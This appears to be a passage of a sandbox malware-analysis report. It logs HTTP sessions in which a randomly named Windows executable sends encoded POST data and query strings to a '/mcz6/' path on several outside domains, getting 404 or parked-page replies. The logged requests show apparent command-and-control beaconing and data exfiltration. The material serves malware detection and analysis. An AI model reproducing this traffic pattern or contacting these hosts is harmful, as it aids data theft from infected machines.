Jun 6, 2024 13:27:49.969362020 CEST	782	OUT	POST /mcz6/ HTTP/1.1 Host: www.gledingakademiet.no Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.gledingakademiet.no Referer: http://www.gledingakademiet.no/mcz6/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 43 44 53 5a 69 62 37 68 6f 6a 76 56 38 7a 63 69 79 2b 62 7a 55 68 71 57 56 6f 6f 5a 49 46 76 4e 73 62 4e 55 64 78 38 77 67 35 53 6c 41 72 52 73 45 6e 75 51 42 5a 5a 39 58 55 5a 6b 45 41 57 78 69 44 71 67 49 41 6f 55 42 49 46 37 51 77 50 49 30 6b 49 67 63 72 30 6d 4c 62 72 71 44 75 76 48 73 6e 41 4a 6f 62 35 47 46 2b 44 78 78 45 5a 5a 36 79 66 6e 52 69 68 76 4c 68 4b 4f 61 79 6e 74 32 34 6c 62 68 74 6e 6e 5a 4d 65 53 61 79 41 35 79 2f 63 77 34 4d 76 6e 41 77 50 38 30 58 53 66 57 47 59 34 36 73 31 61 47 69 46 51 62 79 54 76 6d 57 44 36 4d 42 34 4e 71 7a 77 4b 53 72 46 37 43 69 37 6e 61 47 48 59 38 55 51 64 76 70 62 57 67 76 32 4b 6c 4d 77 3d Data Ascii: l65lvjLx=CDSZib7hojvV8zciy+bzUhqWVooZIFvNsbNUdx8wg5SlArRsEnuQBZZ9XUZkEAWxiDqgIAoUBIF7QwPI0kIgcr0mLbrqDuvHsnAJob5GF+DxxEZZ6yfnRihvLhKOaynt24lbhtnnZMeSayA5y/cw4MvnAwP80XSfWGY46s1aGiFQbyTvmWD6MB4NqzwKSrF7Ci7naGHY8UQdvpbWgv2KlMw=
Jun 6, 2024 13:27:50.825208902 CEST	161	IN	HTTP/1.1 404 Not Found Content-Length: 18 Content-Type: text/plain Date: Thu, 06 Jun 2024 11:27:50 GMT Server: Caddy Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49779	104.37.39.71	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:27:52.497412920 CEST	10864	OUT	POST /mcz6/ HTTP/1.1 Host: www.gledingakademiet.no Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.gledingakademiet.no Referer: http://www.gledingakademiet.no/mcz6/ Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 43 44 53 5a 69 62 37 68 6f 6a 76 56 38 7a 63 69 79 2b 62 7a 55 68 71 57 56 6f 6f 5a 49 46 76 4e 73 62 4e 55 64 78 38 77 67 34 71 6c 41 59 5a 73 47 47 75 51 41 5a 5a 39 57 55 5a 70 45 41 57 67 69 44 53 73 49 41 6b 69 42 4f 42 37 54 53 33 49 79 56 49 67 54 72 30 6d 4a 62 72 72 4f 4f 75 48 73 6e 77 4e 6f 62 70 47 46 2b 44 78 78 44 70 5a 73 54 66 6e 54 69 68 73 4d 68 4b 43 4a 69 6e 42 32 2b 4e 4c 68 74 6a 64 59 38 2b 53 61 53 77 35 77 4b 41 77 6c 63 76 70 4e 51 4f 35 30 58 65 36 57 43 34 61 36 76 6f 39 47 68 5a 51 59 32 69 47 79 33 48 4e 51 47 56 54 2f 79 4d 56 52 59 56 74 42 77 58 43 61 33 54 2f 6b 6e 52 32 30 71 57 30 2f 64 69 72 30 5a 6b 37 39 45 4a 79 53 61 33 6b 53 68 59 76 53 31 59 32 4f 51 56 7a 2f 44 68 6a 68 63 72 6f 68 30 44 7a 35 43 6c 6f 73 73 67 45 64 73 69 68 6d 63 67 6f 72 70 6a 41 7a 78 79 52 6e 55 7a 59 79 59 46 2f 49 49 31 67 6d 4c 73 76 36 33 75 6b 76 4f 6d 4a 46 31 68 71 45 48 63 4d 56 37 73 61 47 4f 74 57 42 42 79 31 69 2f 4f 49 56 36 63 41 4f 46 65 59 5a [TRUNCATED] Data Ascii: l65lvjLx=CDSZib7hojvV8zciy+bzUhqWVooZIFvNsbNUdx8wg4qlAYZsGGuQAZZ9WUZpEAWgiDSsIAkiBOB7TS3IyVIgTr0mJbrrOOuHsnwNobpGF+DxxDpZsTfnTihsMhKCJinB2+NLhtjdY8+SaSw5wKAwlcvpNQO50Xe6WC4a6vo9GhZQY2iGy3HNQGVT/yMVRYVtBwXCa3T/knR20qW0/dir0Zk79EJySa3kShYvS1Y2OQVz/Dhjhcroh0Dz5ClossgEdsihmcgorpjAzxyRnUzYyYF/II1gmLsv63ukvOmJF1hqEHcMV7saGOtWBBy1i/OIV6cAOFeYZjf2gDsj3adzQxYdBabtnTMzcnJELqavT/WzGQOZtyFix+ENfptRcvLfOhYd5IZLSiGIiDYcBmhEL/v/CaD81Vz1Ht2s/COtvZC/JTlvvjAk8AIw5MuRqHblwZNh9wJaDWcTZ8R7Lu/VnxqGDcl1phxXZb4HfhCAKYj12FMARinCKxORZKNB+4DDox5qpN66aP0o2QyA3gP/mqFZTC4fy6ugrxV1Y8Gp11dQYL+MoiXpZebeL+U8wbJFnS4xQ3x9BHysEC2lsGsZcHcrqUznmUMynU9yOuU8P7jRTMxLh+nLA5gwoTJVQcs389TfAOeURNTPHqydmW73hv/GrwMlmxPpMjFCjoMrx2ruzv9GTEogsHNmFh1zR96cyAhLc2oyNT5bWUiZQSZ8e3ibiX0BQeX3Ns0TFkBK9HBxJy2Gk18N2d31FT2spnlsWjbQi6JvhU2PQKLhEnsILhYFLgCxTPtFGL/5cQCSr++4sysW63CtcViY9CIcl5Er04Bep8jZdaNp0Gs3TCOe2wFQlLMy/nYpcgb4rk3jQW7u8ss9YsQdfsqgLuiZbqG6Z+NMFtZxYXuqFcZQBSBq5BeBqjw2wqAI/7GO9QFN8gmogD+SWN+R3ZEcHJk26rFg8fyszymmdWfGQMrQf1Wm4vmxnVciAisKlwhgI1Ne9kN [TRUNCATED]
Jun 6, 2024 13:27:53.346728086 CEST	161	IN	HTTP/1.1 404 Not Found Content-Length: 18 Content-Type: text/plain Date: Thu, 06 Jun 2024 11:27:53 GMT Server: Caddy Connection: close Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49780	104.37.39.71	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:27:55.028027058 CEST	488	OUT	GET /mcz6/?l65lvjLx=PB65ht3xmDnV1ShWjeHediWpJ6xhKUn+w4dQHmlxp9S6BIZIF1eyIZ9SallNAheKgV6/CipsbblBAwuU+20rDr4rF7jlE8qBiXwygrRuGMbV3F1YqBDOThA=&Znv8F=zltpR6V05ztTbh HTTP/1.1 Host: www.gledingakademiet.no Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 6, 2024 13:27:55.882009029 CEST	252	IN	HTTP/1.1 200 OK Content-Length: 101 Content-Type: text/html; charset=utf-8 Date: Thu, 06 Jun 2024 11:27:55 GMT Server: Caddy Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 68 31 3e 50 61 72 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: <html><head> <title>Parked</title></head><body> <h1>Parked</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49781	199.59.243.225	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:28:09.334309101 CEST	747	OUT	POST /mcz6/ HTTP/1.1 Host: www.zwervertjes.be Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.zwervertjes.be Referer: http://www.zwervertjes.be/mcz6/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 6e 6c 66 54 6e 6f 4c 50 74 39 71 46 78 6e 2b 59 4d 75 75 70 36 59 77 39 4c 32 5a 34 46 50 70 44 61 51 4c 6b 47 45 6b 6b 39 62 6c 46 4f 57 74 47 49 65 2f 38 50 35 6a 42 6d 70 54 4b 51 4d 4f 6b 5a 51 37 6d 42 43 7a 36 6a 31 42 35 66 52 4c 6b 6f 59 44 62 64 6a 4b 47 77 58 42 6f 47 77 70 44 4e 75 78 36 77 58 71 72 6a 33 46 77 76 48 31 39 68 49 4c 2b 6e 32 36 59 70 49 6c 47 74 73 73 4b 31 66 6a 78 39 74 35 42 4a 72 72 75 50 39 33 7a 75 75 59 6c 50 39 5a 73 42 36 4a 30 30 6c 77 57 67 45 70 6b 39 50 64 36 54 59 69 57 4f 61 31 6c 2f 49 7a 30 2f 6c 35 67 70 61 5a 47 45 74 34 4a 4f 77 3d 3d Data Ascii: l65lvjLx=nlfTnoLPt9qFxn+YMuup6Yw9L2Z4FPpDaQLkGEkk9blFOWtGIe/8P5jBmpTKQMOkZQ7mBCz6j1B5fRLkoYDbdjKGwXBoGwpDNux6wXqrj3FwvH19hIL+n26YpIlGtssK1fjx9t5BJrruP93zuuYlP9ZsB6J00lwWgEpk9Pd6TYiWOa1l/Iz0/l5gpaZGEt4JOw==
Jun 6, 2024 13:28:09.950978041 CEST	1236	IN	HTTP/1.1 200 OK date: Thu, 06 Jun 2024 11:28:09 GMT content-type: text/html; charset=utf-8 content-length: 1126 x-request-id: 94cc671d-05f5-43fc-825c-53825c9c9be0 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA== set-cookie: parking_session=94cc671d-05f5-43fc-825c-53825c9c9be0; expires=Thu, 06 Jun 2024 11:43:09 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 45 72 46 66 34 32 2f 37 66 70 57 52 63 4c 38 6b 56 6a 6d 74 6a 4a 44 53 56 54 56 67 74 61 38 2f 74 6b 30 6f 43 52 61 64 4f 68 63 2b 6e 44 78 39 41 73 6e 48 51 71 44 44 38 33 7a 31 45 2f 70 75 5a 68 41 50 50 4d 32 70 37 4a 61 30 30 36 59 7a 55 43 48 63 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jun 6, 2024 13:28:09.951088905 CEST	579	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTRjYzY3MWQtMDVmNS00M2ZjLTgyNWMtNTM4MjVjOWM5YmUwIiwicGFnZV90aW1lIjoxNzE3NjczMj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49782	199.59.243.225	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:28:11.901386976 CEST	767	OUT	POST /mcz6/ HTTP/1.1 Host: www.zwervertjes.be Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.zwervertjes.be Referer: http://www.zwervertjes.be/mcz6/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 6e 6c 66 54 6e 6f 4c 50 74 39 71 46 72 47 4f 59 4b 50 75 70 38 34 77 79 45 57 5a 34 65 2f 6f 49 61 51 48 6b 47 46 77 30 39 70 52 46 4f 79 70 47 4a 62 54 38 4d 35 6a 42 70 4a 53 41 55 4d 4f 74 5a 51 48 75 42 43 2f 36 6a 31 46 35 66 54 54 6b 6f 49 2f 59 50 6a 4b 2b 38 33 42 71 49 51 70 44 4e 75 78 36 77 58 4f 46 6a 7a 70 77 73 30 74 39 7a 71 69 6f 6b 32 36 62 2f 59 6c 47 70 73 73 77 31 66 6a 48 39 73 55 55 4a 74 76 75 50 2f 66 7a 76 2f 59 69 55 4e 59 6e 4d 61 49 35 69 6c 42 59 72 52 45 2f 30 38 74 5a 53 73 69 35 43 38 6b 2f 75 35 53 6a 74 6c 64 54 30 64 51 79 4a 75 46 41 56 36 4a 38 6f 6b 2f 4c 71 43 67 30 6c 42 38 44 46 64 67 39 7a 43 59 3d Data Ascii: l65lvjLx=nlfTnoLPt9qFrGOYKPup84wyEWZ4e/oIaQHkGFw09pRFOypGJbT8M5jBpJSAUMOtZQHuBC/6j1F5fTTkoI/YPjK+83BqIQpDNux6wXOFjzpws0t9zqiok26b/YlGpssw1fjH9sUUJtvuP/fzv/YiUNYnMaI5ilBYrRE/08tZSsi5C8k/u5SjtldT0dQyJuFAV6J8ok/LqCg0lB8DFdg9zCY=
Jun 6, 2024 13:28:12.702299118 CEST	1236	IN	HTTP/1.1 200 OK date: Thu, 06 Jun 2024 11:28:11 GMT content-type: text/html; charset=utf-8 content-length: 1126 x-request-id: 6080d16c-a568-46de-a7c7-c21cf344c590 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA== set-cookie: parking_session=6080d16c-a568-46de-a7c7-c21cf344c590; expires=Thu, 06 Jun 2024 11:43:12 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 45 72 46 66 34 32 2f 37 66 70 57 52 63 4c 38 6b 56 6a 6d 74 6a 4a 44 53 56 54 56 67 74 61 38 2f 74 6b 30 6f 43 52 61 64 4f 68 63 2b 6e 44 78 39 41 73 6e 48 51 71 44 44 38 33 7a 31 45 2f 70 75 5a 68 41 50 50 4d 32 70 37 4a 61 30 30 36 59 7a 55 43 48 63 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jun 6, 2024 13:28:12.702320099 CEST	579	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjA4MGQxNmMtYTU2OC00NmRlLWE3YzctYzIxY2YzNDRjNTkwIiwicGFnZV90aW1lIjoxNzE3NjczMj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49783	199.59.243.225	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:28:14.435389042 CEST	10849	OUT	POST /mcz6/ HTTP/1.1 Host: www.zwervertjes.be Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.zwervertjes.be Referer: http://www.zwervertjes.be/mcz6/ Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 6e 6c 66 54 6e 6f 4c 50 74 39 71 46 72 47 4f 59 4b 50 75 70 38 34 77 79 45 57 5a 34 65 2f 6f 49 61 51 48 6b 47 46 77 30 39 70 70 46 4f 48 39 47 49 34 72 38 44 5a 6a 42 6b 70 53 42 55 4d 50 39 5a 51 76 55 42 43 6a 71 6a 77 5a 35 51 51 62 6b 2f 4c 6e 59 56 7a 4b 2b 30 58 42 6e 47 77 70 7a 4e 75 68 2b 77 58 2b 46 6a 7a 70 77 73 79 70 39 6c 49 4b 6f 69 32 36 59 70 49 6c 43 74 73 74 66 31 66 36 79 39 73 67 45 4a 39 50 75 4f 66 76 7a 6f 4e 41 69 59 4e 59 6c 4e 61 4a 71 69 6c 4e 54 72 56 6b 7a 30 38 70 6a 53 72 53 35 53 70 52 68 36 64 65 67 38 57 68 5a 76 71 6b 71 46 64 6b 45 56 34 68 49 6b 46 44 58 39 57 38 74 6c 6a 6c 72 55 65 55 2f 67 32 38 53 6b 71 48 4a 71 41 68 50 66 55 64 57 47 4f 79 70 42 48 5a 56 42 6e 49 48 66 46 69 70 74 4d 42 63 72 4b 6b 39 4c 57 53 35 67 74 58 56 6a 2f 44 61 4c 6f 6a 6c 56 57 36 42 6c 70 34 4a 70 2f 4a 38 64 4d 6c 71 54 32 78 75 6e 4d 31 56 79 6a 6d 37 6a 42 42 6d 36 52 56 54 56 4b 67 55 44 66 51 31 62 33 78 75 74 46 35 4c 46 4a 6e 34 41 6e 61 7a 6e [TRUNCATED] Data Ascii: l65lvjLx=nlfTnoLPt9qFrGOYKPup84wyEWZ4e/oIaQHkGFw09ppFOH9GI4r8DZjBkpSBUMP9ZQvUBCjqjwZ5QQbk/LnYVzK+0XBnGwpzNuh+wX+Fjzpwsyp9lIKoi26YpIlCtstf1f6y9sgEJ9PuOfvzoNAiYNYlNaJqilNTrVkz08pjSrS5SpRh6deg8WhZvqkqFdkEV4hIkFDX9W8tljlrUeU/g28SkqHJqAhPfUdWGOypBHZVBnIHfFiptMBcrKk9LWS5gtXVj/DaLojlVW6Blp4Jp/J8dMlqT2xunM1Vyjm7jBBm6RVTVKgUDfQ1b3xutF5LFJn4AnaznRW6kLXpSmghuZTvKyrZ9MfgIQ2eLd6Z6s/l8cBylkv8pDow1RtnSiHOSawO+5n82LaparBkjvsP03phj6m+MpUoMGPY3iYHl1TDaLufWMM17ls69UhyBeWzzAIvWyCBwhjPtRmFP+/a0ZPTWCzzv4X7K/YG43CETQpeVBDAXO2975dPafu+R83cIrL7/5DTVj2CFO5IT5LDhHEQNJ+sACWJ6MJ27hrfkP3TGFVwJU6WFN8c7brDrG4wJYviKTGxvHug0fe0XGHWC0+ZUS8yiwqRq6Sp91QLeU/06As28tatRSnUjGaMvxH825xqgam6825GSVxlekqLyDqAz3TTs6QgQHminNjwyjRtkSO/VRZ9r27n89N1mC+KZ0ZgKUNMqHkJE+JXt4p4izoA8sO0TIARj8AcwcnVgDmRpKVhFqKEeHz5Y4recAiuq8CuSNFuHGJ3mA3nijnVZtY8yneXG/+Aj0MMekXeOk17Qojs7PkP/vrPUTSZVP3e9Xg1LaszpMdqklxkgEVKzwnxRWUVKsmJbygaOG4hv/72QD1gXzg6NEFijGTWTpQ2Egb1o/ktD+20XwPwlu9nyowEhdSwdWb0z2TuXtZ2OOk7Wp855lDouWeVFkcJ4oMTXZCvdwy8lmlVI1eUdL/JRBJ1pGWbS0Xtu014XpxgweE [TRUNCATED]
Jun 6, 2024 13:28:15.076339006 CEST	1236	IN	HTTP/1.1 200 OK date: Thu, 06 Jun 2024 11:28:14 GMT content-type: text/html; charset=utf-8 content-length: 1126 x-request-id: ca7fa98e-8856-4e7f-bc73-f23c6320af76 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA== set-cookie: parking_session=ca7fa98e-8856-4e7f-bc73-f23c6320af76; expires=Thu, 06 Jun 2024 11:43:15 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 45 72 46 66 34 32 2f 37 66 70 57 52 63 4c 38 6b 56 6a 6d 74 6a 4a 44 53 56 54 56 67 74 61 38 2f 74 6b 30 6f 43 52 61 64 4f 68 63 2b 6e 44 78 39 41 73 6e 48 51 71 44 44 38 33 7a 31 45 2f 70 75 5a 68 41 50 50 4d 32 70 37 4a 61 30 30 36 59 7a 55 43 48 63 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
